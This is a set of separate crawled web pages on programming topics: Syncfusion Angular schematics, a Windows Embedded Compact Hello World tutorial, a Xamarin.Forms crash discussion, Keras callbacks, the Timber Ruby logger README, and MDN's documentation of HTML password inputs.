in the following command: ng add @syncfusion/ej2-angular-popups ––modules=”tooltip” Include code examples The Syncfusion ListView component is now configured into the Angular CLI application. Next, we are going to include the default ListView code example into this application, using the ng generate command. ng g @syncfusion/ej2-angular-lists:listview-default ––name=syncfusion-lists This command will include the code examples in the syncfusion-lists Angular component file. You can reference the folder syncfusion-lists for created component file changes. The command execution should look like the following figure. Adding ListView to the Application Routing for Syncfusion ListView Finally, we must include the routing for the created ListView Angular component in the app.routing.ts file. [app.routing.ts] import { NgModule } from ‘@angular/core’; import { Routes, RouterModule } from ‘@angular/router’; // Syncfusion ListView component routing. import { SyncfusionListsComponent } from ‘./syncfusion-lists/syncfusion-lists.component’; const routes: Routes = [ { path: ‘lists’, component: SyncfusionListsComponent }, { path: ”, pathMatch: ‘full’, redirectTo : ‘lists’ } ]; @NgModule({ imports: [RouterModule.forRoot(routes)], exports: [RouterModule] }) export class AppRoutingModule { } Serve the application Go to the application directory and launch the server using the following command: ng serve ––open Once all the files are compiled successfully, the site will be served at. The ListView default sample should look something like the following figure. ListView Sample Served If you wish, navigate to the following location to explore the code examples for the Syncfusion ListView component: node_modules/@syncfusion/ej2-angular-lists/schematics/generators Location of ListView Examples You can replace the listview-default name with the proper folder name to include a specific code example of our ListView component using the ng g command from the include code examples section above. For example, the remote-list code example will be included when you use the following command: ng g @syncfusion/ej2-angular-lists:listview-remotelist ––name=syncfusion-lists Summary In this blog, we learned how to use Syncfusion Angular Schematics to configure and generate samples for our Angular components in an Angular CLI application using simple commands. Feel free to check out the Syncfusion Angular components on GitHub, our sample browser, and our documentation to explore live demos of the components and their various customization features. ebook:
https://www.syncfusion.com/blogs/post/schematics-for-syncfusion-angular-ui-components.aspx
CC-MAIN-2019-26
en
refinedweb
Create Your First Application (Compact 2013) 9/29/2014 You can create applications for Windows Embedded Compact 2013 in two ways: you can add them as subprojects of the OS in Platform Builder, or you can use an SDK to create them in Visual Studio outside of Platform Builder. In this exercise, you will create your application as a subproject of Platform Builder. You can write Windows Embedded Compact 2013 applications in either native (C++) code or managed code. In this example, you use native code. Add a subproject to your OS design - In Platform Builder, open your OS design project. - Go to Project>Add New Subproject to start the Subproject Wizard. - On the Select name, location and templates page, under Available templates, select WCE Application. - Enter a Subproject name, and then select a Location for the project files. - On the Auto-generated subproject files page, select A simple application, and then click Finish. In Solution Explorer, your new subproject appears under the Subprojects node of your OS design. Modify the code In this exercise, you will add code to your subproject so that your device displays a Getting Started window with the text Hello, World! In the Solution Explorer pane, go to Subprojects>{your application name}>Source files, and then open the C++ file for your application ({your application name}.cpp). Add your code to the C++ file to display a window with the text Hello, World!. Or, if you want, you can copy the sample code below, and then paste it into the source file. #include "stdafx.h" TCHAR szTitle[] = TEXT("Getting Started"); TCHAR szWindowClass[] = TEXT("Getting Started"); ATOM MyRegisterClass(HINSTANCE hInstance); BOOL InitInstance(HINSTANCE, int); LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow ) { MyRegisterClass(hInstance); if (!InitInstance (hInstance, nCmdShow)) { return FALSE; } MSG msg; while (GetMessage(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return msg.wParam; } ATOM MyRegisterClass( HINSTANCE hInstance ) { WNDCLASS wc; wc.style = CS_HREDRAW | CS_VREDRAW; wc.lpfnWndProc = (WNDPROC) WndProc; wc.cbClsExtra = 0; wc.cbWndExtra = 0; wc.hInstance = hInstance; wc.hIcon = 0; wc.hCursor = 0; wc.hbrBackground = (HBRUSH) GetStockObject(WHITE_BRUSH); wc.lpszMenuName = 0; wc.lpszClassName = szWindowClass; return RegisterClass(&wc); } BOOL InitInstance(HINSTANCE hInstance, int nCmdShow) { HWND hWnd = CreateWindow ( szWindowClass, szTitle, WS_VISIBLE | WS_SYSMENU | WS_CAPTION, 250, 190, 150, 75, NULL, NULL, hInstance, NULL ); if (!hWnd) { return FALSE; } ShowWindow(hWnd, nCmdShow); UpdateWindow(hWnd); return TRUE; } LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { PAINTSTRUCT ps; HDC hdc; switch (message) { case WM_PAINT: hdc = BeginPaint(hWnd, &ps); RECT rt; GetClientRect(hWnd, &rt); DrawText(hdc, TEXT("\nHello, World!"), -1, &rt, DT_CENTER); EndPaint(hWnd, &ps); break; case WM_DESTROY: PostQuitMessage(0); break; default: return DefWindowProc(hWnd, message, wParam, lParam); } return 0; } Build your subproject Now build your subproject and include the application’s executable file with your OS run-time image. (You can build the entire OS again, but if you build just the subproject, the build process is much, much faster, and you don’t have to detach your test device.) Note Before you build your application subproject, you must have an existing build for this OS design. To build the subproject In Solution Explorer, expand the Subprojects node, and then select your application subproject. Go to Build>Build All Subprojects. Download and run the application Use the same steps from Connect to your virtual device and download the OS run-time image to update the run-time image on your test device. When your test device boots with the new OS run-time image, use the following procedure to run the application on your device. To run the application In Platform Builder, go to Target>Run Programs. Select the executable file for your application ({your application name}.exe), and then click Run. Your test device should now display a window with the text “Hello, World!” Learn more about - Subprojects in your OS design A subproject is a collection of files that calls the APIs of the features that are included in your OS design. A subproject can be an application, a dynamic-link library (DLL), or a static library. For more information, see Create Your Application as a Platform Builder Subproject. - Control your target device The Target Control lets you transfer files to a target device, load and manage debugger DLLs, and test applications. For more information about the Target Control commands, see Target Control Debugging. - Use an SDK to develop applications For more information about how you can develop and test applications without using Platform Builder, see Create Your Application Using an SDK for an OS Image. - Develop applications with XAML for Windows Embedded For detailed information, see Getting Started with XAML for Windows Embedded.
https://docs.microsoft.com/en-us/previous-versions/windows/embedded/jj200344%28v%3Dwinembedded.80%29
CC-MAIN-2019-35
en
refinedweb
Hi there, I have a cross platform iOS/Android Forms project that crashes on Android any time a Button is removed from a StackLayout, or a StackLayout with a Button in it is removed from the page's Content. The most simple version of the code in Forms that causes the crash looks like this: ` public class LoginPageTest : ContentPage { StackLayout Layout1; StackLayout Layout2; Button OnBoardLoginButton; Label Label1; public LoginPageTest() { Layout1 = new StackLayout { HorizontalOptions = LayoutOptions.FillAndExpand, VerticalOptions = LayoutOptions.FillAndExpand }; OnBoardLoginButton = new Button { Text = "PRESS ME" }; OnBoardLoginButton.Pressed += OnLoginButtonPressed; Layout1.Children.Add(OnBoardLoginButton); Content = Layout1; } private void OnLoginButtonPressed(object sender, EventArgs e) { Layout1.Children.Remove(OnBoardLoginButton); } } ` The error reported is: Unable to activate instance of type Xamarin.Forms.Platform.Android.AppCompat.ButtonRenderer from native handle 0xbe8b2e6c (key_handle 0x3004107). The same error happens on Android (but not iOS) if the Content property of the page is changed from one StackLayout with a Button in it to another StackLayout. This error doesn't happen on iOS. It only happens on Android and happens on devices and the simulator. Is this normal behaviour? I have some ideas on how to work around it, but I'd like to avoid implementing them and keep the same code if I can, since it already works fine in iOS. Thanks for your time. Honestly it doesn't surprise me. When you go against good practices all sorts of unexpected bad things happen. Something is probably about half rendered when yo remove it and suddenly there is no reference etc. Try following accepted practices by building your UI in XAML... and don't add/remove controls from code behind like that. This is not Windows Forms circa 1997. Thanks Alessandro. This was my planned workaround. Ok. Thanks for the solution.
https://forums.xamarin.com/discussion/comment/342623/
CC-MAIN-2019-35
en
refinedweb
Keras Callbacks Explained In Three Minutes A gentle introduction to callbacks in Keras. Learn about EarlyStopping, ModelCheckpoint, and other callback functions with code examples. Building Deep Learning models without callbacks is like driving a car with no functioning brakes — you have little to no control over the whole process that is very likely to result in a disaster. In this article, you will learn how to monitor and improve your Deep Learning models using Keras callbacks like ModelCheckpoint and EarlyStopping. What are callbacks? From the Keras documentation: A callback is a set of functions to be applied at given stages of the training procedure. You can use callbacks to get a view on internal states and statistics of the model during training. You define and use a callback when you want to automate some tasks after every training/epoch that help you have controls over the training process. This includes stopping training when you reach a certain accuracy/loss score, saving your model as a checkpoint after each successful epoch, adjusting the learning rates over time, and more. Let’s dive deep into some callback functions! EarlyStopping Overfitting is a nightmare for Machine Learning practitioners. One way to avoid overfitting is to terminate the process early. The EarlyStopping function has various metrics/arguments that you can modify to set up when the training process should stop. Here are some relevant metrics: - monitor: value being monitored, i.e: val_loss - min_delta: minimum change in the monitored value. For example, min_delta=1 means that the training process will be stopped if the absolute change of the monitored value is less than 1 - patience: number of epochs with no improvement after which training will be stopped - restore_best_weights: set this metric to True if you want to keep the best weights once stopped The code example below will define an EarlyStopping function that tracks the val_loss value, stops the training if there are no changes towards val_loss after 3 epochs, and keeps the best weights once the training stops: from keras.callbacks import EarlyStoppingearlystop = EarlyStopping(monitor = 'val_loss', min_delta = 0, patience = 3, verbose = 1, restore_best_weights = True) ModelCheckpoint This callback saves the model after every epoch. Here are some relevant metrics: - filepath: the file path you want to save your model in - monitor: the value being monitored - save_best_only: set this to True if you do not want to overwrite the latest best model - mode: auto, min, or max. For example, you set mode=’min’if the monitored value is val_lossand you want to minimize it. Example: from keras.callbacks import ModelCheckpointcheckpoint = ModelCheckpoint(filepath, monitor='val_loss', mode='min', save_best_only=True, verbose=1) LearningRateScheduler from keras.callbacks import LearningRateSchedulerscheduler = LearningRateScheduler(schedule, verbose=0) # schedule is a function This one is pretty straightforward: it adjusts the learning rate over time using a schedule that you already write beforehand. This function returns the desired learning rate (output) based on the current epoch (epoch index as input). Other Callbacks functions Along with the above functions, there are other callbacks that you might encounter or want to use in your Deep Learning project: - History and BaseLogger: callbacks that are applied automatically to your model by default - TensorBoard: This is hands down my favorite Keras callback. This callback writes a log for TensorBoard, which is TensorFlow’s excellent visualization tool. If you have installed TensorFlow with pip, you should be able to launch TensorBoard from the command line: tensorboard — logdir=/full_path_to_your_logs - CSVLogger: This callback streams epoch results to a csv file - LambdaCallback: This callback allows you to build custom callback Conclusion In this article, you have learned the main concept of callbacks in Keras and the callback functions. Keras document has a very comprehensive page on callbacks that you should definitely check out:
https://medium.com/towards-artificial-intelligence/keras-callbacks-explained-in-three-minutes-846a43b44a16?source=collection_home---4------0-----------------------
CC-MAIN-2019-35
en
refinedweb
Code Inspections in XML InspectionDescriptionDefault Severity XML tag empty body Reports empty tag body.The validation works in XML / JSP / JSPX / HTML/ XHTML file types. Warning Unresolved DTD reference Checks consistency of DTD specific references, e.g. references to XML entity or to DTD element declaration.The validation works in DTD or XML file types. Error File does not pass external validation Thoroughly checks XML files for DTD / schema compliance using Xerces validator.The validation works in XML or XHTML file types. Error Duplicate ID This inspection checks for duplicate "id" attributes in XML. Error Unresolved ID This inspection checks for unresolved "id" attributes in XML. Error Wrong root element This inspection checks if root tag name is the same as in <doctype>. Error Unbound XML namespace prefix This inspection checks for unbound namespace prefixes in XML. Warning Unused XML schema declaration Checks for unused namespace declarations and location hints in XML Warning File path resolving in XML Highlights unresolved file references in XML. Error Redundant default attribute value assignment This inspection checks for redundant default XML attribute value assignment. Warning Deprecated elements This inspection checks for deprecated XML elements.The elements can be marked by XML comment or documentation tag with text "deprecated". Warning XML highlighting Highlights XML validation problems in the results of batch code inspection. Error Last modified: 16 August 2019 Code Inspections in VueCode Inspections in XPath
https://www.jetbrains.com/help/rider/Code_Inspections_in_XML.html
CC-MAIN-2019-35
en
refinedweb
🌲 Timber - Log Better. Solve Problems Faster. Overview Timber for Ruby is a drop in replacement for your logger. It takes a different approach to structured logging. Instead of parsing, which relies on non-standard, unreadable, hard to use text logs, Timber integrates directly with your application, augmenting your logs with rich metadata and context. It automatically transforms your logs into rich events, fundamentally changing the way you use your logs. - Easy setup - mix timber.install - Seamlessly integrates with popular libraries and frameworks - Modern fast console, designed specifically for your application Installation In your Gemfile, add the timbergem: gem 'timber', '~> 2.1' In your shell, run bundle install In your shell, run bundle exec timber install Usage Basic logging Use the `Timber::Logger` just like you would `::Logger`: ```ruby logger.info("My log message") # use warn, error, debug, etc. # => My log message @metadata "info", "context": {...} ``` --- Custom events Custom events allow you to extend beyond events already defined in the [`Timber::Events`](lib/timber/events) namespace. ```ruby logger.warn "Payment rejected", payment_rejected: "abcd1234", amount: 100, reason: "Card expired" # => Payment rejected @metadata "warn", "event": {"payment_rejected": {"customer_id": "abcd1234", "amount": 100, "reason": "Card expired"}, "context": ...} ``` * Notice the `:payment_rejected` root key. Timber will classify this event as such. * In the [Timber console]() use the query: `type:payment_rejected` or `payment_rejected.amount:>100`. * See more details on our [custom events docs page]() --- Custom contexts Context is additional data shared across log lines. Think of it like log join data. This is how a query like `context.user.id:1` can show you all logs generated by that user. Custom contexts allow you to extend beyond contexts already defined in the [`Timber::Contexts`](lib/timber/contexts) namespace. ```ruby logger.with_context(build: "1.0.0") do logger.info("My log message") end # => My log message @metadata "info", "context": {"build": {"version": "1.0.0"}} ``` * Notice the `:build` root key. Timber will classify this context as such. * In the [Timber console]() use queries like: `build.version:1.0.0` * See more details on our [custom contexts docs page]() --- Metrics & Timings Aggregates destroy details, and with Timber capturing metrics and timings is just logging events. Timber is built on modern big-data principles, it can calculate aggregates across terrabytes of data in seconds. Don't reduce the quality of your log data to accomodate a restrive logging system. Here's a timing example. Notice how Timber automatically calculates the time and adds the timing to the message. ```ruby timer = Timber::Timer.start # ... code to time ... logger.info("Processed background job", background_job: timer) # => Processed background job in 54.2ms @metadata "info", "event": {"background_job": {"time_ms": 54.2}} ``` And of course, `time_ms` can also take a `Float` or `Fixnum`: ```ruby logger.info("Processed background job", background_job: 45.6) ``` Lastly, metrics aren't limited to timings. You can capture any metric you want: ```ruby logger.info("Credit card charged", credit_card_charge: 123.23) # => Credit card charged @metadata "info", "event": {"credit_card_charge": {"amount": 123.23}} ``` In Timber you can easily sum, average, min, and max the `amount` attribute across any interval you desire. Configuration Below are a few popular configuration options, for a comprehensive list, see Timber::Config. Logrageify. Silence noisy logs (sql query, template renders) Timber allows you to silence noisy logs that aren't of value to you, just like [lograge](). In fact, we've provided a convenience method for anyone transitioning from lograge: ```ruby # config/initializers/timber.rb config = Timber::Config.instance config.logrageify!() ``` It turns) ``` Into this: ``` Get "/" sent 200 OK in 79ms @metadata ... ``` Internally this is equivalent to: ```ruby # config/initializers/timber.rb config = Timber::Config.instance config.integrations.action_controller.silence = true config.integrations.action_view.silence = true config.integrations.active_record.silence = true config.integrations.rack.http_events.collapse_into_single_event = true ``` Feel free to deviate and customize which logs you silence. We recommend a slight deviation from lograge with the following settings: ```ruby # config/initializers/timber.rb config = Timber::Config.instance config.integrations.action_view.silence = true config.integrations.active_record.silence = true config.integrations.rack.http_events.collapse_into_single_event = true ``` This does _not_ silence the controller call log event. This is because Timber captures the parameters passed to the controller, which are generally valuable when debugging. For a full list of integration settings, see [Timber::Config::Integrations]() --- Silence specific requests (LB health checks, etc) The following will silence all `[GET] /_health` requests: ```ruby # config/initializers/timber.rb config = Timber::Config.instance config.integrations.rack.http_events.silence_request = lambda do |rack_env, rack_request| rack_request.path == "/_health" end ``` We require a block because it gives you complete control over how you want to silence requests. The first parameter being the traditional Rack env hash, the second being a [Rack Request]() object. --- Change log formats Simply set the formatter like you would with any other logger: ```ruby # This is set in your various environment files logger.formatter = Timber::Logger::JSONFormatter.new ``` Your options are: 1. [`Timber::Logger::AugmentedFormatter`]() - (default) A human readable format that _appends_ metadata to the original log line. The Timber service can parse this data appropriately. Ex: `My log message @metadata "level":"info","dt":"2017-01-01T01:02:23"level":"info","dt":"2017-01-01T01:02:23.234321Z"` 2. [`Timber::Logger::JSONFormatter`]() - Ex: `log message","dt":"2017-01-01T01:02:23.234321Z"` 3. [`Timber::Logger::MessageOnlyFormatter`]() - For use in development / test. Prints logs as strings with no metadata attached. Ex: `My log message` --- Capture custom user context By default Timber automatically captures user context for most of the popular authentication libraries (Devise, Omniauth, and Clearance). See [Timber::Integrations::Rack::UserContext]() for a complete list. In cases where you Timber doesn't support your strategy, or you want to customize it further, you can do so like: ```ruby # config/initializers/timber.rb config = Timber::Config.instance config.integrations.rack.user_context.custom_user_hash = lambda do |rack_env| user = rack_env['warden'].user if user { id: user.id, # unique identifier for the user, can be an integer or string, name: user.name, # identifiable name for the user, email: user.email, # user's email address } else nil end end ``` *All* of the user hash keys are optional, but you must provide at least one. --- Capture release / deploy context [Timber::Contexts::Release]() tracks the current application release and version. If you're on Heroku, simply enable the [dyno metadata]() feature. If you are not, set the following environment variables and this context will be added automatically: 1. `RELEASE_COMMIT` - Ex: `2c3a0b24069af49b3de35b8e8c26765c1dba9ff0` 2. `RELEASE_CREATED_AT` - Ex: `2015-04-02T18:00:42Z` 3. `RELEASE_VERSION` - Ex: `v2.3.1` All variables are optional, but at least one must be present. --- Jibber-Jabber Which log events does Timber structure for me? Out of the box you get everything in the [`Timber.Events`](lib/timber/events) namespace. We also add context to every log, everything in the [`Timber.Contexts`](lib/timber/contexts) namespace. Context is structured data representing the current environment when the log line was written. It is included in every log line. Think of it like join data for your logs. --- What about my current log statements? They'll continue to work as expected. Timber adheres strictly to the default `Logger` interface and will never deviate in *any* way. In fact, traditional log statements for non-meaningful events, debug statements, etc, are encouraged. In cases where the data is meaningful, consider [logging a custom event](#usage). When to use metadata or events? At it's basic level, both metadata and events serve the same purpose: they add structured data to your logs. And anyone that's implemented structured logging know's this can quickly get out of hand. This is why we created events. Here's how we recommend using them: 1. Use `events` when the log cleanly maps to an event that you'd like to alert on, graph, or use in a meaningful way. Typically something that is core to your business or application. 2. Use metadata for debugging purposes; when you simply want additional insight without polluting the message. ### Example 1: Logging that a payment was rejected This is clearly an event that is meaningful to your business. You'll probably want to alert and graph this data. So let's log it as an official event: ```ruby logger.info("Payment rejected", payment_rejected: "xiaus1934", amount: 1900, currency: "USD") ``` ### Example 2: Logging that an email was changed This is definitely log worthy, but not something that is core to your business or application. Instead of an event, use metadata: ```ruby logger.info("Email successfully changed", old_email: old_email, new_email: new_email) ``` ---
https://www.rubydoc.info/github/timberio/timber-ruby
CC-MAIN-2019-35
en
refinedweb
Contains the gui2 timer routines. More... #include "utils/functional.hpp" #include <SDL2 std::function object it's possible to make the callback as fancy as wanted. Definition in file timer.hpp.
http://devdocs.wesnoth.org/timer_8hpp.html
CC-MAIN-2019-35
en
refinedweb
password. Note: Any forms involving sensitive information like passwords (e.g. login forms) should be served over HTTPS; Many browsers now implement mechanisms to warn against insecure login forms; see Insecure passwords. Value. Note: The line feed (U+000A) and carriage return (U+000D) characters are not permitted in a password value. When setting the value of a password control, line feed and carriage return characters are stripped out of the value. Additional attributes In addition to the attributes that operate on all <input> elements regardless of their type, password field inputs support the following attributes: maxlength The maximum number of characters (as UTF-16 code units) the user can enter into the password field. This must be an integer value 0 or higher. If no maxlength is specified, or an invalid value is specified, the password password entry field. This must be an non-negative integer value smaller than or equal to the value specified by maxlength. If no minlength is specified, or an invalid value is specified, the password input has no minimum length. The input. Use of a pattern is strongly recommended for password inputs, in order to help ensure that valid passwords using a wide assortment of character classes are selected and used by your users. With a pattern, you can mandate case rules, require the use of some number of digits and/or punctionation characters, and so forth. See the section. Using password inputs Password input boxes generally work just like other textual input boxes; the main difference is the obscuring of the content to prevent people near the user from reading the password. A simple password input Here we see the most basic password input, with a label established using the <label> element. <label for="userPassword">Password: </label> <input id="userPassword" type="password"> Allowing autocomplete To allow the user's password manager to automatically enter the password, specify the autocomplete attribute. For passwords, this should typically be one of the following: on - Allow the browser or a password manager to automatically fill out the password field. This isn't as informative as using either current-passwordor new-password. off - Don't allow the browser or password manager to automatically fill out the password field. Note that some software ignores this value, since it's typically harmful to users' ability to maintain safe password practices. current-password - Allow the browser or password manager to enter the current password for the site. This provides more information than ondoes, since it lets the browser or password manager automatically enter currently-known password for the site in the field, but not to suggest a new one. new-password - Allow the browser or password manager to automatically enter a new password for the site; this is used on "change your password" and "new user" forms, on the field asking the user for a new password. The new password may be generated in a variety of ways, depending on the password manager in use. It may simply fill in a new suggested password, or it might show the user an interface for creating one. <label for="userPassword">Password:</label> <input id="userPassword" type="password" autocomplete="current-password"> Making the password mandatory To tell the user's browser that the password field must have a valid value before the form can be submitted, simply specify the Boolean required attribute. <label for="userPassword">Password: </label> <input id="userPassword" type="password" required> <input type="submit" value="Submit"> Specifying an input mode. If the PIN is for one-time use, set the autocomplete attribute to off to suggest that it's not saved. <label for="pin">PIN: </label> <input id="pin" type="password" inputmode="numeric"> Setting length requirements"> Selecting text As with other textual entry controls, you can use the select() method to select all the text in the password field. HTML <label for="userPassword">Password: </label> <input id="userPassword" type="password" size="12"> <button id="selectAll">Select All</button> JavaScript document.getElementById("selectAll").onclick = function() { document.getElementById("userPassword").select(); } Result. Validation" autocomplete="new-password"> disabled This Boolean attribute indicates that the password field is not available for interaction. Additionally, disabled field values aren't submitted with the form. Examples Requesting a Social Security number This example only accepts input which matches the format for a valid United States Social Security Number. These numbers, used for tax and identification purposes in the US, are in the form "123-45-6789". Assorted rules for what values are permitted in each group exist as well. HTML <label for="ssn">SSN:</label> <input type="password" id="ssn" inputmode="numeric". The inputmode is set to numeric and session restore features trying to set its value, since this isn't a password at all. JavaScript; } Result Specifications Browser compatibility Legend - Full support - Full support - No support - No support - Compatibility unknown - Compatibility unknown - Non-standard. Expect poor cross-browser support. - Non-standard. Expect poor cross-browser support.
https://developer.cdn.mozilla.net/de/docs/Web/HTML/Element/input/password
CC-MAIN-2019-35
en
refinedweb